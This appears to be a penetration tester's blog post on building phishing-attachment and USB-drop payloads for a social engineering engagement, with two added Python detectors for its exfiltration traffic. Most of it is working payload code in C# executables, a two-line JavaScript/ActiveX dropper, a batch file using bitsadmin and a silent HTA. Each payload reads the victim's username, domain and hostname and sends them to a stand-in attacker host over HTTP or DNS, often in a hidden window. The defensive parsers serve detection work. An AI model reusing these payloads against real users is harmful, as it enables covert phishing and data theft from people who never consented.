Executable Phishing Payloads
Last week I was working on a social engineering engagement that included pretext phone calls, email phishing, and USB drops. I had to build payloads for the phishing email attachments and USB drops. This engagement was standalone and was not supporting other testing efforts such as an internal pentest, so the payloads didn't have to do anything fancy. I just needed proof that they were executed. Ideally, I wanted to collect the following information with each execution:
- Username
- Domain
- Hostname
I needed to build some kind of executable payload that could provide me with that information remotely. I played around with a few ideas and came up with some simple solutions. I thought I’d document them here in case they are useful for anyone else.
Data Exfiltration
Regardless of the type of payload used, I needed a way to exfiltrate the required data back to me remotely. I used two methods to do this: HTTP and DNS.
HTTP Exfiltration
One option was to make an HTTP GET request to a web server I control. The GET request URL parameters would contain the user variables. Something like this:
http://www.MyAttackServer.com/exfiltrate?username=User1&Domain=SomeDomain&Hostname=PC1
I could then run a simple HTTP server on my attack server and log incoming requests.
DNS Exfiltration
Another option I played with was to use DNS to exfiltrate data. In this case, I could generate a hostname like:
username_domain_hostname.MyAttackServer.com
Rather than set up my own DNS entries, I opted to build payloads that specified MyAttackServer.com as the DNS server. That way the victim machine would connect to my attack server to look up the IP address for username_domain_hostname.MyAttackServer.com. I ran Responder.py in a screen session with only DNS enabled. Thanks to James for that idea! This created a log of incoming DNS requests that I could parse later.
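From the defender's side, both channels leave identity-shaped values in logs: an underscore-joined DNS label, or query-string values that match real hostnames and usernames. The following Python example is added here and is not from the original post; it parses constructed resolver-query and web-access log lines and flags entries whose DNS label or query-string values match two or more tokens from a known host/user inventory. The log formats and the KNOWN_TOKENS inventory are assumptions.

```python
"""Flag identity-shaped exfiltration in DNS query and HTTP access logs.
Added example, not from the original post; log formats and the inventory
of known names are constructed assumptions.
"""
import re
from urllib.parse import parse_qs, urlsplit

# Constructed inventory: hostnames, usernames and the AD domain, lowercased.
KNOWN_TOKENS = {"pc1", "user1", "somedomain"}

# Constructed sample log lines: two resolver query logs, two web access logs.
SAMPLE_LOGS = [
    "2024-01-01T10:00:00 dns query 10.0.0.5 PC1_SomeDomain_User1.MyAttackServer.com A",
    "2024-01-01T10:00:01 dns query 10.0.0.5 www.example.com A",
    '10.0.0.5 - - [01/Jan/2024:10:00:02] "GET /exfiltrate?username=User1&Domain=SomeDomain&Hostname=PC1 HTTP/1.1" 200',
    '10.0.0.5 - - [01/Jan/2024:10:00:03] "GET /index.html HTTP/1.1" 200',
]

DNS_RE = re.compile(r"dns query (\S+) (\S+) ")
HTTP_RE = re.compile(r'"GET (\S+) HTTP/')


def dns_identity_tokens(qname):
    """Inventory tokens found in the leftmost label, split on underscores."""
    leftmost = qname.split(".")[0].lower()
    return {t for t in leftmost.split("_") if t in KNOWN_TOKENS}


def http_identity_tokens(path):
    """Inventory tokens found among the query-string values of a request."""
    values = (v.lower() for vals in parse_qs(urlsplit(path).query).values() for v in vals)
    return {v for v in values if v in KNOWN_TOKENS}


def find_exfil(lines, min_tokens=2):
    """Return (source_ip, indicator, tokens) for lines carrying at least
    min_tokens identity tokens; the threshold keeps single-name lookups out."""
    hits = []
    for line in lines:
        m = DNS_RE.search(line)
        if m:
            tokens = dns_identity_tokens(m.group(2))
            if len(tokens) >= min_tokens:
                hits.append((m.group(1), m.group(2), tokens))
            continue
        m = HTTP_RE.search(line)
        if m:
            tokens = http_identity_tokens(m.group(1))
            if len(tokens) >= min_tokens:
                hits.append((line.split()[0], m.group(1), tokens))
    return hits
```

The two-token threshold is a tuning choice: a single matching label (a host looking up its own name) is common, while a host name, user name and domain together in one label or one query string is not.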
File Formats
I needed a payload that could be executed when a user double-clicked it within Windows. There are a variety of executable file formats in Windows. Here are some payloads I put together using the above exfiltration methods and various file formats.
EXE Payload
The most obvious choice was a simple executable (.exe) payload. I wrote something simple in .NET to exfiltrate the data via HTTP.
using System;
using System.Collections.Generic;
using System.Linq;
using System.Text;
using System.Threading.Tasks;
using System.Net;

namespace exfil
{
    internal class Program
    {
        static void Main(string[] args)
        {
            // Identity of the user and machine that ran the file
            String username = Environment.UserName;
            String domain = Environment.UserDomainName;
            String host = Environment.MachineName;
            string url = @"http://MyAttackServer.com/test.html?u=" + username + "&d=" + domain + "&h=" + host;
            HttpWebRequest request = (HttpWebRequest)WebRequest.Create(url);
            request.AutomaticDecompression = DecompressionMethods.GZip;
            // The response body is not needed; the request itself is the proof of execution
            using (HttpWebResponse response = (HttpWebResponse)request.GetResponse())
            {
            }
        }
    }
}
I also wrote a payload that used DNS to exfiltrate the data. This could be done better by performing the DNS lookup directly in the C# code instead of relying on a separate nslookup process, but this was the quickest and easiest way I could get this working with the DNS server specified as my own server.
using System;
using System.Collections.Generic;
using System.Linq;
using System.Text;
using System.Threading.Tasks;

namespace exfil
{
    internal class Program
    {
        static void Main(string[] args)
        {
            // Identity of the user and machine that ran the file
            String username = Environment.UserName;
            String domain = Environment.UserDomainName;
            String host = Environment.MachineName;
            // Run nslookup in a hidden cmd.exe window, pointing it at MyAttackServer.com as the resolver
            System.Diagnostics.Process process = new System.Diagnostics.Process();
            System.Diagnostics.ProcessStartInfo startInfo = new System.Diagnostics.ProcessStartInfo();
            startInfo.WindowStyle = System.Diagnostics.ProcessWindowStyle.Hidden;
            startInfo.FileName = "cmd.exe";
            startInfo.Arguments = "/C nslookup " + host + "_" + domain + "_" + username + ".MyAttackServer.com MyAttackServer.com";
            process.StartInfo = startInfo;
            process.Start();
        }
    }
}
JavaScript
JavaScript (.js) files will execute with cscript.exe by default on Windows. You can do some tricky things with this. I built a payload that used ActiveX to run nslookup for DNS exfiltration. It’s just two lines, but it gets the job done.
// Replace MyAttackServer.com with your own host
var shell = new ActiveXObject('WScript.Shell');
shell.Run('cmd.exe /C nslookup %processor_architecture%_%COMPUTERNAME%_%USERDOMAIN%_%USERNAME%.MyAttackServer.com MyAttackServer.com');
Batch File Payload
Batch files (.bat) are an old-school way to write shell scripts on Windows. The batch script below uses bitsadmin.exe to connect back to an attacker-controlled web server. The web server URL parameters contain the data to be exfiltrated. This script could easily be updated to use the DNS exfiltration method.
@ECHO OFF
for /f %%i in ('whoami') do set u=%%i
ECHO %u%
bitsadmin.exe /transfer "exfil" http://MyAttackServer.com/user=%u% C:\windows\temp\test.dll
HTA Payload
HTA files (.hta) can run VBScript and can therefore execute powerful payloads. The HTA payload below exfiltrates data using the HTTP method.
<!DOCTYPE html>
<html>
<head>
<HTA:APPLICATION icon="#" WINDOWSTATE="normal" SHOWINTASKBAR="no" SYSMENU="no" CAPTION="no" BORDER="none" SCROLL="no" />
<script type="text/vbscript">
    Private Sub Go()
        Dim objNetwork : Set objNetwork = CreateObject("WScript.Network")
        Dim username
        username = objNetwork.UserName
        Dim domain
        domain = objNetwork.UserDomain
        Dim hostname
        hostname = objNetwork.ComputerName
        Dim url
        url = "http://MyAttackServer.com/phish?domain=" & domain & "&username=" & username & "&hostname=" & hostname
        Dim o
        Set o = CreateObject("MSXML2.XMLHTTP")
        o.open "GET", url, False
        o.send
    End Sub

    ' Entry point, called below as soon as the script block loads
    Sub AutoOpen()
        Go
    End Sub

    window.resizeTo 0,0
    AutoOpen
    Close
</script>
</head>
<body>
</body>
</html>
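Because the nslookup-based payloads name an external resolver explicitly, the identity-bearing query goes straight to that server; the internal resolver sees at most the lookup of the server's own name, so the DNS-log check earlier on this page misses them and endpoint process telemetry is the place to catch them. The following Python example is added here and is not from the original post; it classifies constructed Sysmon-style process-creation records, flagging nslookup run with an explicit server and an underscore-joined name, and bitsadmin /transfer to a URL, when the parent is a script host or the cmd.exe those hosts spawn. The field names follow Sysmon Event ID 1; the sample events and SUSPECT_PARENTS list are assumptions.

```python
"""Classify process-creation events for script-host driven exfiltration.
Added example, not from the original post. Field names follow Sysmon
Event ID 1; the sample events and parent-process list are constructed.
"""
import shlex

# Parents worth scrutinising: Windows Script Host, the HTA host, and the
# cmd.exe that the .js and .exe payloads above spawn in between.
SUSPECT_PARENTS = {"wscript.exe", "cscript.exe", "mshta.exe", "cmd.exe"}

# Constructed sample events (Image, ParentImage, CommandLine as in Sysmon).
SAMPLE_EVENTS = [
    {"Image": r"C:\Windows\System32\nslookup.exe", "ParentImage": r"C:\Windows\System32\cmd.exe",
     "CommandLine": "nslookup PC1_SomeDomain_User1.MyAttackServer.com MyAttackServer.com"},
    {"Image": r"C:\Windows\System32\nslookup.exe", "ParentImage": r"C:\Windows\System32\cmd.exe",
     "CommandLine": "nslookup www.example.com"},
    {"Image": r"C:\Windows\System32\bitsadmin.exe", "ParentImage": r"C:\Windows\System32\cmd.exe",
     "CommandLine": r'bitsadmin.exe /transfer "exfil" http://MyAttackServer.com/user=CORP\user1 C:\windows\temp\test.dll'},
    {"Image": r"C:\Windows\System32\nslookup.exe", "ParentImage": r"C:\Windows\System32\svchost.exe",
     "CommandLine": "nslookup PC1_SomeDomain_User1.MyAttackServer.com MyAttackServer.com"},
]


def basename(path):
    return path.rsplit("\\", 1)[-1].lower()


def classify(event):
    """Return a tag for a suspicious event, or None."""
    if basename(event["ParentImage"]) not in SUSPECT_PARENTS:
        return None
    image = basename(event["Image"])
    # posix=False keeps Windows backslashes and quoted tokens intact.
    argv = shlex.split(event["CommandLine"], posix=False)
    if image == "nslookup.exe":
        positional = [a for a in argv[1:] if not a.startswith("-")]
        # A name plus an explicit server, with an underscore-joined leftmost label
        if len(positional) == 2 and "_" in positional[0].split(".")[0]:
            return "nslookup-explicit-server"
    elif image == "bitsadmin.exe":
        lowered = [a.lower() for a in argv[1:]]
        if "/transfer" in lowered and any(a.startswith(("http://", "https://")) for a in lowered):
            return "bitsadmin-transfer"
    return None


def scan(events):
    """Return (CommandLine, tag) for every event classify() flags."""
    return [(e["CommandLine"], tag) for e in events if (tag := classify(e)) is not None]
```

The parent filter is what keeps the last sample quiet; in practice the ancestry of interest also includes Office and mail-client processes that opened the attachment.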